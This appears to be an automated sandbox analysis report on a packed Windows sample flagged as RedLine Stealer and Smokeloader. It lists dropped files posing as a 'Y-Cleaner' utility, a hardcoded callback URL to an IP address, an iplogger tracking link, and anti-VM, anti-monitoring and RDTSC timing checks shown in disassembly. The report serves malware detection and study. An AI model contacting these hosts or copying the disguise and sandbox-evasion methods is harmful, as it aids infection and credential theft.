Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0FD000_3_04D0FD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0DF870_3_04D0DF87
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D197060_3_04D19706
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D031200_3_04D03120
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D022C00_3_04D022C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0E2C90_3_04D0E2C9
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D14AEE0_3_04D14AEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0AA900_3_04D0AA90
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D152190_3_04D15219
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D043500_3_04D04350
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D200_2_00403D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC00_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F500_2_00404F50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109000_2_00410900
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3060_2_0041A306
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB870_2_0040EB87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E190_2_00415E19
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EEC90_2_0040EEC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156EE0_2_004156EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6900_2_0040B690
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B0_2_0099F41B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099881D0_2_0099881D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B8140_2_0099B814
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099D02F0_2_0099D02F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099652B0_2_0099652B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00999A970_2_00999A97
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098FACE0_2_0098FACE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D9E440_2_008D9E44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009916670_2_00991667
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098CF3C0_2_0098CF3C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB26C70_2_00AB26C7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB04DA0_2_00AB04DA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB28250_2_00AB2825
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB27F30_2_00AB27F3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB27DC0_2_00AB27DC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B651B70_2_04B651B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6EDEE0_2_04B6EDEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B63F870_2_04B63F87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6B8F70_2_04B6B8F7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B651B70_2_04B651B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6F1300_2_04B6F130
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B759550_2_04B75955
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B70B670_2_04B70B67
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04D09B60 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04B6A9C7 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
Source: file.exeStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM, 0x8C-variant)
Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2804013001.0000000005E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2804529313.00000000055E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6D106 CreateToolhelp32Snapshot,Module32First,0_2_00F6D106
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7480
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0Jump to behavior
Source: C:\Users\user\Desktop\file.exeCommand line argument: emp0_2_00408770
Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_00408770
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exeString found in binary or memory: 80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe
Source: file.exeStatic file information: File size 1966080 > 1048576
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: file.exeStatic PE information: Raw size of xzazwoxl is bigger than: 0x100000 < 0x1adc00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xzazwoxl:EW;tfoohvpc:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: file.exeStatic PE information: real checksum: 0x1e4ce0 should be: 0x1e3e31
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: xzazwoxl
Source: file.exeStatic PE information: section name: tfoohvpc
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D095F7 push ecx; ret 0_3_04D0960A
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D2037D push esi; ret 0_3_04D20386
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008250A4 push edi; mov dword ptr [esp], edx0_2_008250CA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D4CA push 7C574925h; mov dword ptr [esp], eax0_2_0085D4EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D4CA push eax; mov dword ptr [esp], 4FD4A597h0_2_0085D552
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D4CA push edi; mov dword ptr [esp], edx0_2_0085D57A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D4CA push 51648424h; mov dword ptr [esp], edi0_2_0085D5A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D4CA push 2B22D4B2h; mov dword ptr [esp], eax0_2_0085D5F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push ebx; mov dword ptr [esp], edi0_2_0099F47C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 030A52A1h; mov dword ptr [esp], edi0_2_0099F4A3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 4D9B430Fh; mov dword ptr [esp], edx0_2_0099F500
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push edx; mov dword ptr [esp], 6FF7C0E5h0_2_0099F565
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push edx; mov dword ptr [esp], ebx0_2_0099F6A2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push ebx; mov dword ptr [esp], ebp0_2_0099F720
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 6F4A3DEDh; mov dword ptr [esp], ecx0_2_0099F79A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 3AB57A5Ch; mov dword ptr [esp], ebp0_2_0099F7F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 6F139C21h; mov dword ptr [esp], ebp0_2_0099F808
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push edi; mov dword ptr [esp], ecx0_2_0099F836
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 0251F6D9h; mov dword ptr [esp], ebx0_2_0099F86A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push ebp; mov dword ptr [esp], ecx0_2_0099F86E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 31850B54h; mov dword ptr [esp], esp0_2_0099F89E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 61183E5Dh; mov dword ptr [esp], ebx0_2_0099F93E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 59097BECh; mov dword ptr [esp], ecx0_2_0099F94E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push eax; mov dword ptr [esp], ebx0_2_0099F95D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push 282CFB36h; mov dword ptr [esp], edx0_2_0099F9DA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push edi; mov dword ptr [esp], 47659AC4h0_2_0099F9E9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push ebp; mov dword ptr [esp], edx0_2_0099FA27
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F41B push eax; mov dword ptr [esp], esi0_2_0099FA5A
Source: file.exeStatic PE information: section name: xzazwoxl entropy: 7.94137094600595
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826152 second address: 825A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FC1350240CEh 0x0000000c popad 0x0000000d nop 0x0000000e jbe 00007FC1350240C7h 0x00000014 cmc 0x00000015 push dword ptr [ebp+122D0951h] 0x0000001b mov dword ptr [ebp+122D23DEh], edx 0x00000021 call dword ptr [ebp+122D1AD4h] 0x00000027 pushad 0x00000028 cmc 0x00000029 xor eax, eax 0x0000002b jne 00007FC1350240DDh 0x00000031 jmp 00007FC1350240D7h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a cld 0x0000003b mov dword ptr [ebp+122D2840h], eax 0x00000041 mov dword ptr [ebp+122D1830h], ecx 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D1830h], ebx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 pushad 0x00000057 and ah, 00000079h 0x0000005a jmp 00007FC1350240D5h 0x0000005f popad 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D1830h], eax 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c xor dword ptr [ebp+122D1830h], esi 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 jmp 00007FC1350240CEh 0x0000007b nop 0x0000007c jo 00007FC1350240D8h 0x00000082 push eax 0x00000083 push edx 0x00000084 jng 00007FC1350240C6h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A39B7 second address: 9A39BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2AA7 second address: 9A2AC6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007FC1350240CAh 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2AC6 second address: 9A2AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC134D1C046h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2AD1 second address: 9A2AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
